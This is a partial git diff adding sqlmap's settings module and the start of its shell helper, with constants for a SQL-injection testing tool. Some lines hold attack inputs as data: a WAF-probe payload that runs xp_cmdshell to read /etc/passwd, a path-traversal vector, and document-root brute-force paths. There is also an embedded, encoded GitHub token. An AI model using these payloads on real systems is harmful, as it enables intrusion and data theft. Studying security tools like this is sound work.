+PUSH_VALUE_EXCEPTION_RETRY_COUNT = 3 + +# Minimum time response set needed for time-comparison based on standard deviation +MIN_TIME_RESPONSES = 30 + +# Maximum time response set used during time-comparison based on standard deviation +MAX_TIME_RESPONSES = 200 + +# Minimum comparison ratio set needed for searching valid union column number based on standard deviation +MIN_UNION_RESPONSES = 5 + +# After these number of blanks at the end inference should stop (just in case) +INFERENCE_BLANK_BREAK = 5 + +# Use this replacement character for cases when inference is not able to retrieve the proper character value +INFERENCE_UNKNOWN_CHAR = '?' + +# Character used for operation "greater" in inference +INFERENCE_GREATER_CHAR = ">" + +# Character used for operation "greater or equal" in inference +INFERENCE_GREATER_EQUALS_CHAR = ">=" + +# Character used for operation "equals" in inference +INFERENCE_EQUALS_CHAR = "=" + +# Character used for operation "not-equals" in inference +INFERENCE_NOT_EQUALS_CHAR = "!=" + +# String used for representation of unknown DBMS +UNKNOWN_DBMS = "Unknown" + +# String used for representation of unknown DBMS version +UNKNOWN_DBMS_VERSION = "Unknown" + +# Dynamicity boundary length used in dynamicity removal engine +DYNAMICITY_BOUNDARY_LENGTH = 20 + +# Dummy user prefix used in dictionary attack +DUMMY_USER_PREFIX = "__dummy__" + +# Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1 +DEFAULT_PAGE_ENCODING = "iso-8859-1" + +try: + codecs.lookup(DEFAULT_PAGE_ENCODING) +except LookupError: + DEFAULT_PAGE_ENCODING = "utf8" + +# Marker for program piped input +STDIN_PIPE_DASH = '-' + +# URL used in dummy runs +DUMMY_URL = "http://foo/bar?id=1" + +# Timeout used during initial websocket (pull) testing +WEBSOCKET_INITIAL_TIMEOUT = 3 + +# The name of the operating system dependent module imported. The following names have currently been registered: 'posix', 'nt', 'mac', 'os2', 'ce', 'java', 'riscos' +PLATFORM = os.name +PYVERSION = sys.version.split()[0] +IS_WIN = PLATFORM == "nt" + +# Check if running in terminal +IS_TTY = hasattr(sys.stdout, "fileno") and os.isatty(sys.stdout.fileno()) + +# DBMS system databases +MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb", "Resource", "ReportServer", "ReportServerTempDB") +MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema", "sys") +PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent") +ORACLE_SYSTEM_DBS = ("ADAMS", "ANONYMOUS", "APEX_030200", "APEX_PUBLIC_USER", "APPQOSSYS", "AURORA$ORB$UNAUTHENTICATED", "AWR_STAGE", "BI", "BLAKE", "CLARK", "CSMIG", "CTXSYS", "DBSNMP", "DEMO", "DIP", "DMSYS", "DSSYS", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "HR", "IX", "JONES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OC", "OE", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "PAPER", "PERFSTAT", "PM", "SCOTT", "SH", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "TRACESVR", "TSMSYS", "WK_TEST", "WKPROXY", "WKSYS", "WMSYS", "XDB", "XS$NULL") +SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master") +ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2") +FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") +MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN") +SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs") +DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS", "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS") +HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB") +H2_SYSTEM_DBS = ("INFORMATION_SCHEMA",) + ("IGNITE", "ignite-sys-cache") +INFORMIX_SYSTEM_DBS = ("sysmaster", "sysutils", "sysuser", "sysadmin") +MONETDB_SYSTEM_DBS = ("tmp", "json", "profiler") +DERBY_SYSTEM_DBS = ("NULLID", "SQLJ", "SYS", "SYSCAT", "SYSCS_DIAG", "SYSCS_UTIL", "SYSFUN", "SYSIBM", "SYSPROC", "SYSSTAT") +VERTICA_SYSTEM_DBS = ("v_catalog", "v_internal", "v_monitor",) +MCKOI_SYSTEM_DBS = ("",) +PRESTO_SYSTEM_DBS = ("information_schema",) +ALTIBASE_SYSTEM_DBS = ("SYSTEM_",) +MIMERSQL_SYSTEM_DBS = ("information_schema", "SYSTEM",) +CRATEDB_SYSTEM_DBS = ("information_schema", "pg_catalog", "sys") +CLICKHOUSE_SYSTEM_DBS = ("information_schema", "INFORMATION_SCHEMA", "system") +CUBRID_SYSTEM_DBS = ("DBA",) +CACHE_SYSTEM_DBS = ("%Dictionary", "INFORMATION_SCHEMA", "%SYS") +EXTREMEDB_SYSTEM_DBS = ("",) +FRONTBASE_SYSTEM_DBS = ("DEFINITION_SCHEMA", "INFORMATION_SCHEMA") +RAIMA_SYSTEM_DBS = ("",) +VIRTUOSO_SYSTEM_DBS = ("",) + +# Note: () + () +MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms") +MYSQL_ALIASES = ("mysql", "my") + ("mariadb", "maria", "memsql", "tidb", "percona", "drizzle") +PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") + ("cockroach", "cockroachdb", "amazon redshift", "redshift", "greenplum", "yellowbrick", "enterprisedb", "yugabyte", "yugabytedb", "opengauss") +ORACLE_ALIASES = ("oracle", "orcl", "ora", "or") +SQLITE_ALIASES = ("sqlite", "sqlite3") +ACCESS_ALIASES = ("microsoft access", "msaccess", "access", "jet") +FIREBIRD_ALIASES = ("firebird", "mozilla firebird", "interbase", "ibase", "fb") +MAXDB_ALIASES = ("max", "maxdb", "sap maxdb", "sap db") +SYBASE_ALIASES = ("sybase", "sybase sql server") +DB2_ALIASES = ("db2", "ibm db2", "ibmdb2") +HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql") +H2_ALIASES = ("h2",) + ("ignite", "apache ignite") +INFORMIX_ALIASES = ("informix", "ibm informix", "ibminformix") +MONETDB_ALIASES = ("monet", "monetdb",) +DERBY_ALIASES = ("derby", "apache derby",) +VERTICA_ALIASES = ("vertica",) +MCKOI_ALIASES = ("mckoi",) +PRESTO_ALIASES = ("presto",) +ALTIBASE_ALIASES = ("altibase",) +MIMERSQL_ALIASES = ("mimersql", "mimer") +CRATEDB_ALIASES = ("cratedb", "crate") +CUBRID_ALIASES = ("cubrid",) +CLICKHOUSE_ALIASES = ("clickhouse",) +CACHE_ALIASES = ("intersystems cache", "cachedb", "cache", "iris") +EXTREMEDB_ALIASES = ("extremedb", "extreme") +FRONTBASE_ALIASES = ("frontbase",) +RAIMA_ALIASES = ("raima database manager", "raima", "raimadb", "raimadm", "rdm", "rds", "velocis") +VIRTUOSO_ALIASES = ("virtuoso", "openlink virtuoso") + +DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_")) + +SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CLICKHOUSE_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES) +SUPPORTED_OS = ("linux", "windows") + +DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES)) + +USER_AGENT_ALIASES = ("ua", "useragent", "user-agent") +REFERER_ALIASES = ("ref", "referer", "referrer") +HOST_ALIASES = ("host",) + +# DBMSes with upper case identifiers +UPPER_CASE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.H2, DBMS.HSQLDB, DBMS.DERBY, DBMS.ALTIBASE)) + +# Default schemas to use (when unable to enumerate) +H2_DEFAULT_SCHEMA = HSQLDB_DEFAULT_SCHEMA = "PUBLIC" +VERTICA_DEFAULT_SCHEMA = "public" +MCKOI_DEFAULT_SCHEMA = "APP" +CACHE_DEFAULT_SCHEMA = "SQLUser" + +# DBMSes where OFFSET mechanism starts from 1 +PLUS_ONE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.ALTIBASE, DBMS.MSSQL, DBMS.CACHE)) + +# Names that can't be used to name files on Windows OS +WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9") + +# Items displayed in basic help (-h) output +BASIC_HELP_ITEMS = ( + "url", + "googleDork", + "data", + "cookie", + "randomAgent", + "proxy", + "testParameter", + "dbms", + "level", + "risk", + "technique", + "getAll", + "getBanner", + "getCurrentUser", + "getCurrentDb", + "getPasswordHashes", + "getDbs", + "getTables", + "getColumns", + "getSchema", + "dumpTable", + "dumpAll", + "db", + "tbl", + "col", + "osShell", + "osPwn", + "batch", + "checkTor", + "flushSession", + "tor", + "sqlmapShell", + "wizard", +) + +# Tags used for value replacements inside shell scripts +SHELL_WRITABLE_DIR_TAG = "%WRITABLE_DIR%" +SHELL_RUNCMD_EXE_TAG = "%RUNCMD_EXE%" + +# String representation for NULL value +NULL = "NULL" + +# String representation for blank ('') value +BLANK = "" + +# String representation for current database +CURRENT_DB = "CD" + +# String representation for current user +CURRENT_USER = "CU" + +# Name of SQLite file used for storing session data +SESSION_SQLITE_FILE = "session.sqlite" + +# Regular expressions used for finding file paths in error messages +FILE_PATH_REGEXES = (r"(?P[^<>]+?) on line \d+", r"\bin (?P[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P/\w[/\w.~-]+)", r"\bhref=['\"]file://(?P/[^'\"]+)", r"\bin (?P[^<]+): line \d+") + +# Regular expressions used for parsing error messages (--parse-errors) +ERROR_PARSING_REGEXES = ( + r"\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\](?P[^<]+)", + r"[^<]{0,100}(fatal|error|warning|exception)[^<]*:?\s*(?P[^<]+)", + r"(?m)^\s{0,100}(fatal|error|warning|exception):?\s*(?P[^\n]+?)$", + r"(sql|dbc)[^>'\"]{0,32}(fatal|error|warning|exception)()?:\s*(?P[^<>]+)", + r"(?P[^\n>]{0,100}SQL Syntax[^\n<]+)", + r"(?s)
  • Error Type:
    (?P.+?)
  • ", + r"CDbCommand (?P[^<>\n]*SQL[^<>\n]+)", + r"Code: \d+. DB::Exception: (?P[^<>\n]*)", + r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)", + r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)", + r"(?Pquery error: SELECT[^<>]+)" +) + +# Regular expression used for parsing charset info from meta html headers +META_CHARSET_REGEX = r'(?si).*]+charset="?(?P[^"> ]+).*' + +# Regular expression used for parsing refresh info from meta html headers +META_REFRESH_REGEX = r'(?i)]+content="?[^">]+;\s*(url=)?["\']?(?P[^\'">]+)' + +# Regular expression used for parsing Javascript redirect request +JAVASCRIPT_HREF_REGEX = r'',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#" + +# Vectors used for provoking specific WAF/IPS behavior(s) +WAF_ATTACK_VECTORS = ( + "", # NIL + "search=", + "file=../../../../etc/passwd", + "q=foobar", + "id=1 %s" % IPS_WAF_CHECK_PAYLOAD +) + +# Used for status representation in dictionary attack phase +ROTATING_CHARS = ('\\', '|', '|', '/', '-') + +# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory) +BIGARRAY_CHUNK_SIZE = 1024 * 1024 + +# Compress level used for storing BigArray chunks to disk (0-9) +BIGARRAY_COMPRESS_LEVEL = 9 + +# Maximum number of socket pre-connects +SOCKET_PRE_CONNECT_QUEUE_SIZE = 3 + +# Only console display last n table rows +TRIM_STDOUT_DUMP_SIZE = 256 + +# Reference: http://stackoverflow.com/a/3168436 +# Reference: https://web.archive.org/web/20150407141500/https://support.microsoft.com/en-us/kb/899149 +DUMP_FILE_BUFFER_SIZE = 1024 + +# Parse response headers only first couple of times +PARSE_HEADERS_LIMIT = 3 + +# Step used in ORDER BY technique used for finding the right number of columns in UNION query injections +ORDER_BY_STEP = 10 + +# Maximum value used in ORDER BY technique used for finding the right number of columns in UNION query injections +ORDER_BY_MAX = 1000 + +# Maximum number of times for revalidation of a character in inference (as required) +MAX_REVALIDATION_STEPS = 5 + +# Characters that can be used to split parameter values in provided command line (e.g. in --tamper) +PARAMETER_SPLITTING_REGEX = r"[,|;]" + +# Attribute used for storing original parameter value in special cases (e.g. POST) +UNENCODED_ORIGINAL_VALUE = "original" + +# Common column names containing usernames (used for hash cracking in some cases) +COMMON_USER_COLUMNS = ("login", "user", "username", "user_name", "user_login", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "utilizator", "utilizador", "usufrutuario", "korisnik", "uporabnik", "usuario", "consumidor", "client", "cuser") + +# Default delimiter in GET/POST values +DEFAULT_GET_POST_DELIMITER = '&' + +# Default delimiter in cookie values +DEFAULT_COOKIE_DELIMITER = ';' + +# Unix timestamp used for forcing cookie expiration when provided with --load-cookies +FORCE_COOKIE_EXPIRATION_TIME = "9999999999" + +# Github OAuth token used for creating an automatic Issue for unhandled exceptions +GITHUB_REPORT_OAUTH_TOKEN = "Z2hwX0pNd0I2U25kN2Q5QmxlWkhxZmkxVXZTSHZiTlRDWjE5NUNpNA" + +# Skip unforced HashDB flush requests below the threshold number of cached items +HASHDB_FLUSH_THRESHOLD = 32 + +# Number of retries for unsuccessful HashDB flush attempts +HASHDB_FLUSH_RETRIES = 3 + +# Number of retries for unsuccessful HashDB retrieve attempts +HASHDB_RETRIEVE_RETRIES = 3 + +# Number of retries for unsuccessful HashDB end transaction attempts +HASHDB_END_TRANSACTION_RETRIES = 3 + +# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism) +HASHDB_MILESTONE_VALUE = "OdqjeUpBLc" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))' + +# Pickle protocl used for storage of serialized data inside HashDB (https://docs.python.org/3/library/pickle.html#data-stream-format) +PICKLE_PROTOCOL = 2 + +# Warn user of possible delay due to large page dump in full UNION query injections +LARGE_OUTPUT_THRESHOLD = 1024 ** 2 + +# On huge tables there is a considerable slowdown if every row retrieval requires ORDER BY (most noticable in table dumping using ERROR injections) +SLOW_ORDER_COUNT_THRESHOLD = 10000 + +# Give up on hash recognition if nothing was found in first given number of rows +HASH_RECOGNITION_QUIT_THRESHOLD = 1000 + +# Regular expression used for automatic hex conversion and hash cracking of (RAW) binary column values +HASH_BINARY_COLUMNS_REGEX = r"(?i)pass|psw|hash" + +# Maximum number of redirections to any single URL - this is needed because of the state that cookies introduce +MAX_SINGLE_URL_REDIRECTIONS = 4 + +# Maximum total number of redirections (regardless of URL) - before assuming we're in a loop +MAX_TOTAL_REDIRECTIONS = 10 + +# Maximum (deliberate) delay used in page stability check +MAX_STABILITY_DELAY = 0.5 + +# Reference: http://www.tcpipguide.com/free/t_DNSLabelsNamesandSyntaxRules.htm +MAX_DNS_LABEL = 63 + +# Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content) +DNS_BOUNDARIES_ALPHABET = re.sub(r"[a-fA-F]", "", string.ascii_letters) + +# Alphabet used for heuristic checks +HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.') + +# Minor artistic touch +BANNER = re.sub(r"\[.\]", lambda _: "[\033[01;41m%s\033[01;49m]" % random.sample(HEURISTIC_CHECK_ALPHABET, 1)[0], BANNER) + +# String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value +DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">" + +# Regular expression used for recognition of file inclusion errors +FI_ERROR_REGEX = r"(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}" + +# Length of prefix and suffix used in non-SQLI heuristic checks +NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6 + +# Connection read size (processing large responses in parts to avoid MemoryError crashes - e.g. large table dump in full UNION injections) +MAX_CONNECTION_READ_SIZE = 10 * 1024 * 1024 + +# Maximum response total page size (trimmed if larger) +MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024 + +# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher) +MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024 + +# Page size threshold used in heuristic checks (e.g. getHeuristicCharEncoding(), identYwaf, htmlParser, etc.) +HEURISTIC_PAGE_SIZE_THRESHOLD = 64 * 1024 + +# Maximum (multi-threaded) length of entry in bisection algorithm +MAX_BISECTION_LENGTH = 50 * 1024 * 1024 + +# Mark used for trimming unnecessary content in large connection reads +LARGE_READ_TRIM_MARKER = "__TRIMMED_CONTENT__" + +# Generic SQL comment formation +GENERIC_SQL_COMMENT = "-- [RANDSTR]" + +# Threshold value for turning back on time auto-adjustment mechanism +VALID_TIME_CHARS_RUN_THRESHOLD = 100 + +# Check for empty columns only if table is sufficiently large +CHECK_ZERO_COLUMNS_THRESHOLD = 10 + +# Boldify all logger messages containing these "patterns" +BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response", "NULL connection is supported", "PASSED", "FAILED", "for more than", "connection to ") + +# TLDs used in randomization of email-alike parameter values +RANDOMIZATION_TLDS = ("com", "net", "ru", "org", "de", "uk", "br", "jp", "cn", "fr", "it", "pl", "tv", "edu", "in", "ir", "es", "me", "info", "gr", "gov", "ca", "co", "se", "cz", "to", "vn", "nl", "cc", "az", "hu", "ua", "be", "no", "biz", "io", "ch", "ro", "sk", "eu", "us", "tw", "pt", "fi", "at", "lt", "kz", "cl", "hr", "pk", "lv", "la", "pe", "au") + +# Generic www root directory names +GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www") + +# Maximum length of a help part containing switch/option name(s) +MAX_HELP_OPTION_LENGTH = 18 + +# Maximum number of connection retries (to prevent problems with recursion) +MAX_CONNECT_RETRIES = 100 + +# Strings for detecting formatting errors +FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Please enter a", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "TypeMismatchException", "CF_SQL_INTEGER", "CF_SQL_NUMERIC", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "Attribute validation error for tag", "is not of type numeric", "__VIEWSTATE[^"]*)[^>]+value="(?P[^"]+)' + +# Regular expression used for extracting ASP.NET event validation values +EVENTVALIDATION_REGEX = r'(?i)(?P__EVENTVALIDATION[^"]*)[^>]+value="(?P[^"]+)' + +# Number of rows to generate inside the full union test for limited output (mustn't be too large to prevent payload length problems) +LIMITED_ROWS_TEST_NUMBER = 15 + +# Default adapter to use for bottle server +RESTAPI_DEFAULT_ADAPTER = "wsgiref" + +# Default REST-JSON API server listen address +RESTAPI_DEFAULT_ADDRESS = "127.0.0.1" + +# Default REST-JSON API server listen port +RESTAPI_DEFAULT_PORT = 8775 + +# Unsupported options by REST-JSON API server +RESTAPI_UNSUPPORTED_OPTIONS = ("sqlShell", "wizard") + +# Use "Supplementary Private Use Area-A" +INVALID_UNICODE_PRIVATE_AREA = False + +# Format used for representing invalid unicode characters +INVALID_UNICODE_CHAR_FORMAT = r"\x%02x" + +# Regular expression for XML POST data +XML_RECOGNITION_REGEX = r"(?s)\A\s*<[^>]+>(.+>)?\s*\Z" + +# Regular expression used for detecting JSON POST data +JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]*"|\d+|true|false|null|\[).*\}\s*(\]\s*)*\Z' + +# Regular expression used for detecting JSON-like POST data +JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*('[^']+'|\"[^\"]+\"|\w+)\s*:\s*('[^']+'|\"[^\"]+\"|\d+).*\}\s*(\]\s*)*\Z" + +# Regular expression used for detecting multipart POST data +MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name=" + +# Regular expression used for detecting Array-like POST data +ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\d*\]=.+%s\2\[\d*\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER) + +# Default POST data content-type +DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8" + +# Raw text POST data content-type +PLAIN_TEXT_CONTENT_TYPE = "text/plain; charset=utf-8" + +# Length used while checking for existence of Suhosin-patch (like) protection mechanism +SUHOSIN_MAX_VALUE_LENGTH = 512 + +# Minimum size of an (binary) entry before it can be considered for dumping to disk +MIN_BINARY_DISK_DUMP_SIZE = 100 + +# Filenames of payloads xml files (in order of loading) +PAYLOAD_XML_FILES = ("boolean_blind.xml", "error_based.xml", "inline_query.xml", "stacked_queries.xml", "time_blind.xml", "union_query.xml") + +# Regular expression used for extracting form tags +FORM_SEARCH_REGEX = r"(?si)" + +# Maximum number of lines to save in history file +MAX_HISTORY_LENGTH = 1000 + +# Minimum field entry length needed for encoded content (hex, base64,...) check +MIN_ENCODED_LEN_CHECK = 5 + +# Timeout in seconds in which Metasploit remote session has to be initialized +METASPLOIT_SESSION_TIMEOUT = 120 + +# Reference: http://www.postgresql.org/docs/9.0/static/catalog-pg-largeobject.html +LOBLKSIZE = 2048 + +# Prefix used to mark special variables (e.g. keywords, having special chars, etc.) +EVALCODE_ENCODED_PREFIX = "EVAL_" + +# Reference: https://en.wikipedia.org/wiki/Zip_(file_format) +ZIP_HEADER = b"\x50\x4b\x03\x04" + +# Reference: http://www.cookiecentral.com/faq/#3.5 +NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File." + +# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens +CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf", "token") + +# Prefixes used in brute force search for web server document root +BRUTE_DOC_ROOT_PREFIXES = { + OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"), + OS.WINDOWS: ("/xampp", "/Program Files/xampp", "/wamp", "/Program Files/wampp", "/Apache/Apache", "/apache", "/Program Files/Apache Group/Apache", "/Program Files/Apache Group/Apache2", "/Program Files/Apache Group/Apache2.2", "/Program Files/Apache Group/Apache2.4", "/Inetpub/wwwroot", "/Inetpub/wwwroot/%TARGET%", "/Inetpub/vhosts/%TARGET%") +} + +# Suffixes used in brute force search for web server document root +BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "www", "data", "sites/all", "www/build") + +# String used for marking target name inside used brute force web server document root +BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%" + +# Character used as a boundary in kb.chars (preferably less frequent letter) +KB_CHARS_BOUNDARY_CHAR = 'q' + +# Letters of lower frequency used in kb.chars +KB_CHARS_LOW_FREQUENCY_ALPHABET = "zqxjkvbp" + +# For filling in case of dumb push updates +DUMMY_JUNK = "jaiSh6bi" + +# Printable bytes +PRINTABLE_BYTES = set(bytes(string.printable, "ascii") if six.PY3 else string.printable) + +# SQL keywords used for splitting in HTTP chunked transfer encoded requests (switch --chunk) +HTTP_CHUNKED_SPLIT_KEYWORDS = ("SELECT", "UPDATE", "INSERT", "FROM", "LOAD_FILE", "UNION", "information_schema", "sysdatabases", "msysaccessobjects", "msysqueries", "sysmodules") + +# CSS style used in HTML dump format +HTML_DUMP_CSS_STYLE = """""" + +# Leaving (dirty) possibility to change values from here (e.g. `export SQLMAP__MAX_NUMBER_OF_THREADS=20`) +for key, value in os.environ.items(): + if key.upper().startswith("%s_" % SQLMAP_ENVIRONMENT_PREFIX): + _ = key[len(SQLMAP_ENVIRONMENT_PREFIX) + 1:].upper() + if _ in globals(): + original = globals()[_] + if isinstance(original, int): + try: + globals()[_] = int(value) + except ValueError: + pass + elif isinstance(original, bool): + globals()[_] = value.lower() in ('1', 'true') + elif isinstance(original, (list, tuple)): + globals()[_] = [__.strip() for __ in _.split(',')] + else: + globals()[_] = value diff --git a/src/sqlmap-master/lib/core/shell.py b/src/sqlmap-master/lib/core/shell.py new file mode 100644 index 0000000..14c0076 --- /dev/null +++ b/src/sqlmap-master/lib/core/shell.py @@ -0,0 +1,151 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import atexit +import os + +from lib.core import readlineng as readline +from lib.core.common import getSafeExString +from lib.core.data import logger +from lib.core.data import paths +from lib.core.enums import AUTOCOMPLETE_TYPE +from lib.core.enums import OS +from lib.core.settings import IS_WIN +from lib.core.settings import MAX_HISTORY_LENGTH + +try: + import rlcompleter + + class CompleterNG(rlcompleter.Completer): + def global_matches(self, text): + """ + Compute matches when text is a simple name. + Return a list of all names currently defined in self.namespace + that match. + """ + + matches = [] + n = len(text) + + for ns in (self.namespace,): + for word in ns: + if word[:n] == text: + matches.append(word) + + return matches +except: + readline._readline = None + +def readlineAvailable(): + """ + Check if the readline is available. By default + it is not in Python default installation on Windows + """ + + return readline._readline is not None + +def clearHistory(): + if not readlineAvailable(): + return + + readline.clear_history() + +def saveHistory(completion=None): + try: + if not readlineAvailable(): + return + + if completion == AUTOCOMPLETE_TYPE.SQL: + historyPath = paths.SQL_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.OS: + historyPath = paths.OS_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.API: + historyPath = paths.API_SHELL_HISTORY + else: + historyPath = paths.SQLMAP_SHELL_HISTORY + + try: + with open(historyPath, 